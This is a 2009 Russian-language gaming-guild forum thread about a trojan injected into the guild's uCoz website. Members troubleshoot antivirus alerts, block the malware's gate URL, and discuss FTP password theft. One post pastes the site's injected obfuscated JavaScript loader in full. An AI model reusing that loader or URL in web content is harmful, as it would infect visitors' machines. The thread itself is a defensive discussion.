|
Троян на сайте
|
|
| immunele |
Дата: Четверг, 12.03.2009, 15:29 | Сообщение # 51 |
|
Logician, спасибо макс, приеду домой настрою.....
immuneleee - берсерк - 55 (ye baby common) лвл
SpongeBob - мау - 51 (19.75%) лвл (общий с братом перс)
immunele - кросс (фармотвинк) - 45 лвл
[Вот кто я!] [Манчкин 53%] [Убийца 3%] [Тусовщик: 13%] [Исследователь 30%]
|
|
|
| Danish |
Дата: Четверг, 12.03.2009, 20:46 | Сообщение # 52 |
|
Logician , спасибо )
–·· ·– –· ·· ··· ····
|
|
|
| Ic3_ScRe4m |
Дата: Четверг, 12.03.2009, 21:25 | Сообщение # 53 |
|
Quote (Fluke) Полазил в настройках обозревателя, защитника и фаерволла винды, везде добавил этот адрес в блокирование, всё равно блин каждый раз вылазит этот троян. Так что делаем блокировку через антивирус, у кого avast!: Настройка сканера доступа -> Web-экран -> Настроить -> Блокировка URL -> Разрешить блокировку URL и добавляем туда эту ссылку http://undest.byethost24.com/gate/index.php
огромное спасибо за инфу. как нуб юзер аваста ставлю +) если еще не поставил (:
О себе:
Придурок. %) >_< РакетчегШахид 48(50%),
МеркШахид(голосовалка)
PoweredByVodka(будующий спец..если буду качать)
Ganjawars.ru ник как тут на форуме.
еврооф УГ!
Hemisphere felis manul bonus:+200 поху*зма, +200 к умению "поиск еды" Аудио: Detroit metal city - SATSUGAI
|
|
|
| Nikki |
Дата: Пятница, 13.03.2009, 00:07 | Сообщение # 54 |
|
К сожалению это не решение проблемы.
Все-таки Алерт не шарага, а новые пользователи посещая сайт все так же видят как топ-гилда Асу сидит на сайте с трояном.
В одной из свежих заявок на прием в алерт-беллато уже видела недоумение человека - "Вы в курсе что у вас троян на сайте?".
Это небольшой, но очень неприятный удар по репутации Алерт. И чем быстрее этот троянчик уберем- тем лучше. 2 Admins: есть ли ответ от саппорта сервиса ucoz?
W.O.T. | Venetica | Alert
|
|
|
| Хатабы4 |
Дата: Пятница, 13.03.2009, 00:30 | Сообщение # 55 |
|
у меня нод ничего не обнаружил, ни на сайте, ни на компе
Хатабы4 52 lvl + 01.13% - каратель, и неипЁт
SHuR 46 lvl - ФармоЛаНчеГ
дед 49 lvl - спец (Блок-механик) 15-тый в списке Forbes B)  С моей помощью, в бан попал0 10 читерюГ)
|
|
|
| gorini4 |
Дата: Пятница, 13.03.2009, 01:23 | Сообщение # 56 |
|
Ответ: Удаляйте все сторонние модули (ссылки) на сайте, которые могут влиять на возникновение проблемы.
Возможно, необходимо восстановить шаблоны некоторых страниц.
Ответил: Наталья | Поступило: 11.03.2009, 00:01 | Ответ дан: 11.03.2009, 15:22
|
|
|
| immunele |
Дата: Пятница, 13.03.2009, 01:25 | Сообщение # 57 |
|
Quote (gorini4) Ответ: Удаляйте все сторонние модули (ссылки) на сайте, которые могут влиять на возникновение проблемы. Возможно, необходимо восстановить шаблоны некоторых страниц. Ответил: Наталья | Поступило: 11.03.2009, 00:01 | Ответ дан: 11.03.2009, 15:22
иииии???? дальше то что? это она типа написала выход из проблемы, либо я один такой недалекий, который этого не понял?)
immuneleee - берсерк - 55 (ye baby common) лвл
SpongeBob - мау - 51 (19.75%) лвл (общий с братом перс)
immunele - кросс (фармотвинк) - 45 лвл
[Вот кто я!] [Манчкин 53%] [Убийца 3%] [Тусовщик: 13%] [Исследователь 30%]
|
|
|
| Nikki |
Дата: Пятница, 13.03.2009, 02:11 | Сообщение # 58 |
|
Единственный сторонний модуль на нашем сайте- это баннер на dota-allstars на главной странице сайта: 
Ну и ссылка на герб гильдии, хранящаяся на хостинге файлов imageshack.us
Эти ресурсы не могут быть заражены, так как их ссылки не имеют никакого отношения к тому адресу на котором сидит троян.
Все остальное на alert.clan.su - стандартный шаблон ucoz №791.
Троян сидит не на "некоторых страницах", как выразилась Наталья, а на всем домене alert.clan.su.
Просьба к админам зайти в панель управления сайта, нажать ссылку "Общее" в меню и посмотреть на каком сервере мы сидим в ucoz (на скрине подчеркнуто), имя сервера. Не s24 ли случаем?
скрин:
Если имя сервера s24- то Наталья лукавит. Вот ссылка трояна: http://undest.byethost24.com/gate/index.php Заражен хост 24. А это их (ucoz) хост, и никакого отношения к нашим любым действиям на сайте с шаблонами он не имеет, так как сторонних ресурсов на alert.clan.su не используется- все стандартно, только то что нам предлагает к использованию сам сервис ucoz и ничего более.
W.O.T. | Venetica | Alert
|
|
|
| gorini4 |
Дата: Пятница, 13.03.2009, 02:27 | Сообщение # 59 |
|
Удивительно, но нет. Мы сидим на s3.
|
|
|
| Nikki |
Дата: Пятница, 13.03.2009, 03:18 | Сообщение # 60 |
|
тогда пробная мера- заменить шаблон дизайна №791 на любой другой. И посмотреть какой результат это даст.
W.O.T. | Venetica | Alert
|
|
|
| Галкинский |
Дата: Пятница, 13.03.2009, 08:40 | Сообщение # 61 |
|
а не может быть эта какашка у когонить в подписи прописана? 
Гена очень срочно ищет квартиру в Питере на съем. Если есть варианты - предлагайте!
|
|
|
| immunele |
Дата: Пятница, 13.03.2009, 09:04 | Сообщение # 62 |
|
Nikki, откуда и с каких пор миледи начали так мощно разбираться в компах? я прям этим так сказать сражен наповал.  
immuneleee - берсерк - 55 (ye baby common) лвл
SpongeBob - мау - 51 (19.75%) лвл (общий с братом перс)
immunele - кросс (фармотвинк) - 45 лвл
[Вот кто я!] [Манчкин 53%] [Убийца 3%] [Тусовщик: 13%] [Исследователь 30%]
|
|
|
| Iceberg017 |
Дата: Пятница, 13.03.2009, 09:43 | Сообщение # 63 |
|
Всетки получается атаковали только нас 
|
|
|
| Nikki |
Дата: Пятница, 13.03.2009, 11:37 | Сообщение # 64 |
|
immunele, это не компы Леш  в компах я ничего не смыслю. просто с лета прошлого сделала себе сайтик на ucoz и там время от времени экспериментирую и учусь разным web-премудростям, штудируя всю литературу по html и js которая попадается  Добавлено (13.03.2009, 11:37)
---------------------------------------------
Quote (Галка) а не может быть эта какашка у когонить в подписи прописана?
нет. тогда бы звенел только форум. а троян и на главной странице сайта, и на странице устава- и вообще на всех страницах сайта. А в уставе и на главной странице подписи пользователей не задействованы.
W.O.T. | Venetica | Alert
|
|
|
|
|
| DARKNESS666 |
Дата: Пятница, 13.03.2009, 15:19 | Сообщение # 66 |
|
|
писец ушастым и пушистым!
|
|
|
|
Сообщений: 175
|
|
Замечания:
|
| Награды: [ 4 ]
|
Репутация
[ 15 ]
|
|
|
|
Когда первый раз заметили троян? в течение двух трех дней до этого кто тут что делал? и кто что сюда добовлял? (файлы любые?!)
Дальше!! сайт взломать! это практически не как! что юкоз заржен то же отпадает! т.к. была бы эта хрень на всех сайтах а тут один! дальше! кто нить писал техподдержки из юкоза? если да что они пишут?
далее! коды страниц перелопачивать не вариант! если он прописан то прописан в общей структуре!! А так же этот код мог добавить тока админ!! тут задается вопрос! админам у кого могли слить лог и пароль от сайта?Добавлено (13.03.2009, 15:19)
---------------------------------------------
В принципе мона предположить что проще отключить загрузку Java скриптов и не париться! у мну два компа на одном включен на другом выключен! на котором включен торомзит зараза писец просто!)) а другой его дажене видет!! и не париться!))
Сообщение изменил:DARKNESS666 - Пятница, 13.03.2009, 15:08
|
|
|
| VacuumCleaner |
Дата: Пятница, 13.03.2009, 16:05 | Сообщение # 67 |
|
Quote (DARKNESS666) и не париться!
Угу, не мешай трояну делать его скромное дело.Добавлено (13.03.2009, 16:05)
---------------------------------------------
Quote (DARKNESS666) дальше! кто нить писал техподдержки из юкоза?
А кто-нибудь читал топик перед написанием поста?)
|
|
|
| Lyagyshonok |
Дата: Пятница, 13.03.2009, 17:06 | Сообщение # 68 |
|
DARKNESS666, сайт взломать легко ...особенно uCoz, т.к. в нём присутствуют дыры...куда без них :)) (не бывает совершенной системы, обязательно найдется хоть 1, но лазейка  ) ты если не заметил, то это бесплатный хостинг.
О том, что заражён Юкоз я например не говорила :-Р и по поводу тех.поддержки Горыныч уже отписывался.
И код страницы перелопаченный ручками тоже имеет смысл т.к. нельзя быть на 100% уверенным даже в себе, чего уж говорить о коде. А код данной бяки вытащить можно. а предположение об отключении скриптов не вижу уместным т.к. на сайт заходят и сторонние люди (для подачи заявок например)..., что не есть гуд для их машинок. ДЛЯ АДМИНОВ! так сказать для информации и руководству к действию
всё подробно расписано дальше смысла писать нет http://www.siteguard.ru - там читаем статьи их мало, но они на "нормальном" русском а вообще рекомендую сайт алерта добавить в список на проверку и установить защиту siteguard Добавлено (13.03.2009, 16:36)
---------------------------------------------
По поводу установки защиты siteguard
Код исполняемого скрипта я им выслала, для пополнения баз сигнатур SiteGuard с ссылкой на наш сайт . Добавлено (13.03.2009, 17:06)
---------------------------------------------
Кому интересно может внести в закладки и проверять подозрительные сайты:
http://www.webscanner.ru вот собственно что пишется про наш сайт 
"Быстрая проверка сайта на доступность и наличие вирусов:
http://alert.clan.su/forum/5-5031-2 : Сайт содержит подозрительный JavaScript код"
Кликни на смайлик  и апни темку на сайте WORLDofTANKS
|
|
|
| Misheler |
Дата: Пятница, 13.03.2009, 17:24 | Сообщение # 69 |
|
Дайте Лягушенку руль, пусть вылечит нас
CrazyBataleTank 51 штурм, после апа будет Мохито =)
тока апа не будет))
Misheler ланч 47+ Я безразлично отношусь к ножевым ударам врага, но мне мучителен булавочный укол друга. Гюго
|
|
|
| ANTCRAZY |
Дата: Пятница, 13.03.2009, 17:57 | Сообщение # 70 |
|
|
муравьишка
|
|
|
|
Сообщений: 214
|
|
|
Замечания:
|
| Награды: [ 6 ]
|
Репутация
[ 26 ]
|
|
|
|
Quote (Lyagyshonok) DARKNESS666, сайт взломать легко ...особенно uCoz, т.к. в нём присутствуют дыры...куда без них :)) (не бывает совершенной системы, обязательно найдется хоть 1, но лазейка ) ты если не заметил, то это бесплатный хостинг. О том, что заражён Юкоз я например не говорила :-Р и по поводу тех.поддержки Горыныч уже отписывался. И код страницы перелопаченный ручками тоже имеет смысл т.к. нельзя быть на 100% уверенным даже в себе, чего уж говорить о коде. А код данной бяки вытащить можно. а предположение об отключении скриптов не вижу уместным т.к. на сайт заходят и сторонние люди (для подачи заявок например)..., что не есть гуд для их машинок. ДЛЯ АДМИНОВ! так сказать для информации и руководству к действию всё подробно расписано дальше смысла писать нет http://www.siteguard.ru - там читаем статьи их мало, но они на "нормальном" русском а вообще рекомендую сайт алерта добавить в список на проверку и установить защиту siteguardДобавлено (13.03.2009, 16:36)---------------------------------------------По поводу установки защиты siteguard Код исполняемого скрипта я им выслала, для пополнения баз сигнатур SiteGuard с ссылкой на наш сайт .Добавлено (13.03.2009, 17:06)---------------------------------------------Кому интересно может внести в закладки и проверять подозрительные сайты: http://www.webscanner.ru вот собственно что пишется про наш сайт "Быстрая проверка сайта на доступность и наличие вирусов: http://alert.clan.su/forum/5-5031-2 : Сайт содержит подозрительный JavaScript код"
кружок юного хакера?
Акрет до мозга костей.
Имперский танчег 54 +21% Offline
Блок-механик 57 отважне спеце,идём к 58 Online
Фантомчег 51 Offline
|
|
|
| Тюха |
Дата: Суббота, 14.03.2009, 11:42 | Сообщение # 71 |
|
|
Вредятина
|
|
|
|
Сообщений: 200
|
|
|
Замечания:
|
| Награды: [ 8 ]
|
Репутация
[ 37 ]
|
|
|
|
Народ, сайты укоза взламываются за 5ть минут, лично наблюдала, как это делается... Иногда взлом занимает меньше времени... и если в лом лазать и исправлять, то проще создать новый сайт...
Боюсь, когда говорят: "Не бойтесь".
Волнуюсь, когда говорят: "Не волнуйтесь".
И очень опасаюсь, когда говорят: "Никакой опасности нет". (с) Гали-Дана Зингер Если мужчина утверждает, что он в доме хозяин, то, и во всех других случаях, он лжёт. (с) Марк Твен 
|
|
|
| Ic3_ScRe4m |
Дата: Воскресенье, 15.03.2009, 02:14 | Сообщение # 72 |
|
Quote (Тюха) то проще создать новый сайт...
"нафиг нафиг нафиг!!! - кричали пьяные пионеры"
там по новой флудить придется чтоль? О_о
О себе:
Придурок. %) >_< РакетчегШахид 48(50%),
МеркШахид(голосовалка)
PoweredByVodka(будующий спец..если буду качать)
Ganjawars.ru ник как тут на форуме.
еврооф УГ!
Hemisphere felis manul bonus:+200 поху*зма, +200 к умению "поиск еды" Аудио: Detroit metal city - SATSUGAI
|
|
|
| TaG |
Дата: Воскресенье, 15.03.2009, 15:20 | Сообщение # 73 |
|
Хыхыхы) ТроянчеГ чистил с рабочего сайта... весёлая штука))))
|
|
|
| DarkWolf |
Дата: Воскресенье, 15.03.2009, 15:24 | Сообщение # 74 |
|
хмм, сегодня нортон ни разу не матерился по поводу виря...
То ли смирился, толи проблему решили.
У кого как?
[Имперский НубоТанчеГ]   55 НубоТанк "Мы не волки мы санитары леса" (сперто) Убийца ЛуиКолдунчега и нубобелкомага IKDFA!!11расрас (список не закрыт...)
|
|
|
| Kuznechik169 |
Дата: Воскресенье, 15.03.2009, 15:59 | Сообщение # 75 |
|
Проблему кажись решили с вирусом
Мои персонажи:
Kuznechik169 - Ланч 52 лвл
Misifts - фармоланч 43 лвл
это я - http://vkontakte.ru/id1865143 =)
НеактивHoly shit! =p
|
|
|
| Хатабы4 |
Дата: Воскресенье, 15.03.2009, 16:15 | Сообщение # 76 |
|
неа, у меня до сих под блокирует браузер ссылку))
Хатабы4 52 lvl + 01.13% - каратель, и неипЁт
SHuR 46 lvl - ФармоЛаНчеГ
дед 49 lvl - спец (Блок-механик) 15-тый в списке Forbes B) С моей помощью, в бан попал0 10 читерюГ)
|
|
|
| Iceberg017 |
Дата: Воскресенье, 15.03.2009, 18:22 | Сообщение # 77 |
|
Ребят что делает этот скрипт? <script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx;;\'Y(iXQ.~_iQZSXQM*.hSn;l5Qi;`Y(i9.FZF"><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charA t%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));</script> Лечение Процесс одновременно и творческий и рутинный. Творческий - потому что имеется много различных видов "левого" кода. Рутинный - потому что придётся просмотреть множество директорий. Следует заметить, что не имеет смысла делать только половину работы. Допустим, почистили код на сервере, но оставили старый пароль - будьте уверены, что бот наведается снова. Или, пароль сменили, но не удалили троянов/вирусню на своем компьютере, не установили заплатки/антивирь - не вопрос, через некоторое время новый пароль будет скомпрометирован.
Скомпрометирован пароль FTP Это наиболее частая причина. Во первых, необходимо сменить пароль FTP-доступа. Если имеется несколько ftp-аккаунтов, которые могут иметь доступ к скриптам, то пароли требуется поменять у всех. Новые пароли рекомендуется записать в текстовый файл и ни в коем случае не сохранять в проводнике Windows.
Сообщение изменил:Iceberg017 - Воскресенье, 15.03.2009, 18:25
|
|
|
| Lyagyshonok |
Дата: Понедельник, 16.03.2009, 09:46 | Сообщение # 78 |
|
Quote (Iceberg017) <script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[B15niAS1(i1I"u"[Xh1бла бла бла многа букаф
Iceberg017, ты бы уж сразу код обработал, а то кидаешь исходник скрипта с представления "мозиллы" .... неАйс батюшка
Собственно пообщались тут с Nikki (у неё есть свой сайт на укозе "не палю " ) так воть, т.к. у нас данная дрянь сидит в рекламном баннере.., а он не правиться в панельке управления...., то надо отписываться в саппорт по данному вопросу, пусть у себя ищут, что рекламируют
А если интересно: то данная дрянь грузит pdf файлики в ифрейм с рандомным именем.
Quote (Lyagyshonok) ДЛЯ АДМИНОВ! так сказать для информации и руководству к действию wink
всё подробно расписано smile дальше смысла писать нет smile
читаем пост выше
и добавляем сайт в списочек http://www.siteguard.ru
Кликни на смайлик и апни темку на сайте WORLDofTANKS
|
|
|
| immunele |
Дата: Понедельник, 16.03.2009, 11:27 | Сообщение # 79 |
|
по-моему все, у меня по крайней мере ничего не выскакивает)
immuneleee - берсерк - 55 (ye baby common) лвл
SpongeBob - мау - 51 (19.75%) лвл (общий с братом перс)
immunele - кросс (фармотвинк) - 45 лвл
[Вот кто я!] [Манчкин 53%] [Убийца 3%] [Тусовщик: 13%] [Исследователь 30%]
|
|
|
| Danish |
Дата: Пятница, 24.04.2009, 16:27 | Сообщение # 80 |
|
у меня картинка синия выскакивает и исчезает Добавлено (24.04.2009, 16:27)
---------------------------------------------
Интересно когда форум станет нормальный, у новичков орет касперский и блочит сайт.
Админы решите проблему плз.
–·· ·– –· ·· ··· ····
Сообщение изменил:Danish - Пятница, 24.04.2009, 16:28
|
|
|
| Сыроежкин |
Дата: Пятница, 24.04.2009, 16:59 | Сообщение # 81 |
|
Quote (Danish) касперский и блочит сайт. Админы решите проблему плз.
Седня тоже жутко материться каспер что за ???777
АДМИНЫЫ!!! ))
GodZill0 - Jade Dynasty - mort - 22 lvl ))
Сыроежкин - RF Online - Assaulter - 51+ Offline
Cыроежкин - Warhammer - Shadow Warrior 40 - Ariel - Offline
http://pink-tzeench.mybrute.com
|
|
|
| антимаг |
Дата: Пятница, 24.04.2009, 19:39 | Сообщение # 82 |
|
Можно перейти на платный хостинг:-)
57+ Striker (антимаг)
55+ Merk (CMEPTb-BCEM)
47+ Striker (tvink100500)
52+ cora (Rescuer)
Все не так, как кажется на первый взгляд...
|
|
|
| Danish |
Дата: Пятница, 24.04.2009, 19:42 | Сообщение # 83 |
|
антимаг, а что измениться? Если переходить, то надо и движок форума покупать IPB или другой как-нить, ток лениво будет заниматься, лето скоро.
–·· ·– –· ·· ··· ····
|
|
|
| антимаг |
Дата: Пятница, 24.04.2009, 19:59 | Сообщение # 84 |
|
Да в том то и дело, что всем все впадлу)
57+ Striker (антимаг)
55+ Merk (CMEPTb-BCEM)
47+ Striker (tvink100500)
52+ cora (Rescuer)
Все не так, как кажется на первый взгляд...
|
|
|
| Danish |
Дата: Пятница, 24.04.2009, 20:04 | Сообщение # 85 |
|
антимаг, угу, удалить ссылку на левый сайт не могут. Я в шоке.
–·· ·– –· ·· ··· ····
Сообщение изменил:Danish - Пятница, 24.04.2009, 20:14
|
|
|
| Хатабы4 |
Дата: Пятница, 24.04.2009, 20:19 | Сообщение # 86 |
|
я хз , но у меня после того как поменяли шаблон форума все норм...
Хатабы4 52 lvl + 01.13% - каратель, и неипЁт
SHuR 46 lvl - ФармоЛаНчеГ
дед 49 lvl - спец (Блок-механик) 15-тый в списке Forbes B) С моей помощью, в бан попал0 10 читерюГ)
|
|
|
| Danish |
Дата: Пятница, 24.04.2009, 20:39 | Сообщение # 87 |
|
Хатабы4, сегодня 2 человека отказались региться на форуме из-за вируса.
–·· ·– –· ·· ··· ····
|
|
|
| Галкинский |
Дата: Пятница, 24.04.2009, 22:14 | Сообщение # 88 |
|
avast! молчит... все норм
Гена очень срочно ищет квартиру в Питере на съем. Если есть варианты - предлагайте!
|
|
|
| Сыроежкин |
Дата: Пятница, 24.04.2009, 23:53 | Сообщение # 89 |
|
Каспер тоже молчал но после того как обновил базу начал вопить как резаный может глюк каспера а может новая разнавидность старой дряни Trojan-Downloader.JS.Iframe....
GodZill0 - Jade Dynasty - mort - 22 lvl ))
Сыроежкин - RF Online - Assaulter - 51+ Offline
Cыроежкин - Warhammer - Shadow Warrior 40 - Ariel - Offline
http://pink-tzeench.mybrute.com
|
|
|
| timmy |
Дата: Суббота, 25.04.2009, 03:36 | Сообщение # 90 |
|
|
|
|
|
Сообщений: 9
|
|
|
Замечания:
|
| Награды: [ 0 ]
|
Репутация
[ 4 ]
|
|
|
|
Доктор веб то ж молчит, но раньше, когда стоял аваст была такая же проблема с дримо-форумом и какими то ещё.
Похоже аваст какой то файлик за троян считает
Делегация Дримов ^_^
Стрелялко =)
|
|
|
| McLeen |
Дата: Суббота, 25.04.2009, 16:47 | Сообщение # 91 |
|
|
|
|
|
Сообщений: 29
|
|
|
Замечания:
|
| Награды: [ 1 ]
|
Репутация
[ 9 ]
|
|
|
|
Странно, но НоД молчит. Однако, пользуюсь оперой (а она режет все нежелательные скрипты). ПОискал в инете способы борьбы, толкового ничего предложить не могут, но цитирую: "Я сильно сомневаюсь, что это проблема хостеров. Почему-то думается мне, что там таки unix-хостинг и админы не используют винду для его администрации.
Дело в том, что есть ряд вирусов, которые тырят пароли от FTP из популярных FTP-клиентов, заходят, используя полученные пароли на хостинг, модифицируют ряд файлов и выходят. Причём, так же эти пароли могут отсылаться автору вируса и т.о. удаление вирусов непосредственно у себя на компьютере не отменяет необходимость смены всех паролей на хостинге. Если кто-то из тех, у кого есть доступ к сайту и у кого сохранены логины/пароли от FTP не использует антивирус, пользуется сильноуязвимыми браузерами (IE) и т.д., то вероятность, что к нему попадёт этот вирус и сворует пароли очень даже велика.
Действия уже описаны Trotil'ом, но я чуть переформулирую:
— проверить компьютеры всех, имеющих доступ к сайту по FTP, на вирусы (трояны, etc.);
— названным выше людям перестать пользоваться IE и начать использовать антивирусы, постоянно обновляя их базы;
— сменить пароли на хостинге." Судя по форумам, выход один - убрать из кода данный скрипт (находится в конце страницы, после </html>). Добавлено (25.04.2009, 16:47)
---------------------------------------------
Как вариант: Аваст может считать данный скрипт потенциально опасным скриптом (как и Касперский). На флэш-картинки они матеряЦа.
У меня данная функция в НОДе отключена.
До 2008г:
Сервер - Asu
Раса - Беллато
Логин - X3Ma11uH
Гильдия - Legend
Лвл - 45
Профессия - Холи Чандра
Пароль - ******** 2008-2009:
Сервер - Asu
Раса - Беллато
Логин - Маклинчик
Гильдия - Alert
Лвл - 48
Профессия - Берсерк Маленький нубик по ресам гулял,
Тут на него злой хай-левел напал.
Долго лечился хай-левел потом -
Хитренький нуб оказался мультом. ©
|
|
|
|
|
| HunterD |
Дата: Суббота, 25.04.2009, 22:48 | Сообщение # 93 |
|
Админы проблему уже не решат, т.к. из-за кое кого самого главного модера мы потеряли.
|
|
|
| timmy |
Дата: Воскресенье, 26.04.2009, 16:41 | Сообщение # 94 |
|
|
|
|
|
Сообщений: 9
|
|
|
Замечания:
|
| Награды: [ 0 ]
|
Репутация
[ 4 ]
|
|
|
|
Да не парьтесь вы, нет на сайте никакого вируса
Больше чем уверен это авастовские родителе что-то перемудрили. Каспер вот часть реестра тоже вирусом считает
Делегация Дримов ^_^
Стрелялко =)
|
|
|
| Галкинский |
Дата: Понедельник, 27.04.2009, 16:04 | Сообщение # 95 |
|
Каспер сегодня заорал, аваст молчит.
Гена очень срочно ищет квартиру в Питере на съем. Если есть варианты - предлагайте!
|
|
|
| KlarWenderer |
Дата: Понедельник, 27.04.2009, 16:34 | Сообщение # 96 |
|
Ydwin, когда и где?цитаты.
Алерт РФО
Несгибаемый чан KlarWenderer
Алерт ВХО
Огненный маг - 100 лвл.Глава гильдии,Звезда вселенского масштаба.
WoT
КlarWenderer - Hummel,Tiger
Steam (Dota2)
Vissionare
Хочешь сделать что то хорошо,сделай это сам,ну или стой с ружьем за спинами тех кто это делает за тебя...
|
|
|
| ЗлобныйПуфыстик |
Дата: Понедельник, 27.04.2009, 18:24 | Сообщение # 97 |
|
Осторожно на сайте обнаружен вирус. Этот вирус втирается ко всем в доверие, раздает почтовый индекс и домашний адрес... и клянчит красную икру!!!!1111111 Кто еще не получил адрес для отправки икры, отписацо в репе...
Мы любим убивать. Мы очень любим убивать. Преимущественно других игроков. Мы не любим убивать мобов. Сильно не любим. Но чтобы убивать других игроков, сперва приходится убить миллионы мобов. (с) Хавасы ВСЕ БЬЮТ ВСЕХ! ДЕФИМ ВСЕХ ОТО ВСЕХ И БЬЕМ ТЕХ ВСЕХ, КОТОРЫЕ ВСЕХ БЬЮТ (с)Vlad1917
|
|
|
| KlarWenderer |
Дата: Понедельник, 27.04.2009, 18:55 | Сообщение # 98 |
|
Вискасу ей,вискасу!!11!
Алерт РФО
Несгибаемый чан KlarWenderer
Алерт ВХО
Огненный маг - 100 лвл.Глава гильдии,Звезда вселенского масштаба.
WoT
КlarWenderer - Hummel,Tiger
Steam (Dota2)
Vissionare
Хочешь сделать что то хорошо,сделай это сам,ну или стой с ружьем за спинами тех кто это делает за тебя...
|
|
|
Horizon 
Breeze 
Forrest 
Violet 
Magmatic 
Oblivion 
20 февраля 2007, основание гильдии Alert в проекте RF-Online
5 февраля 2009, основание Alert в проекте Warhammer Online
14 января 2011, основание клана Alert в проекте World Of Tanks
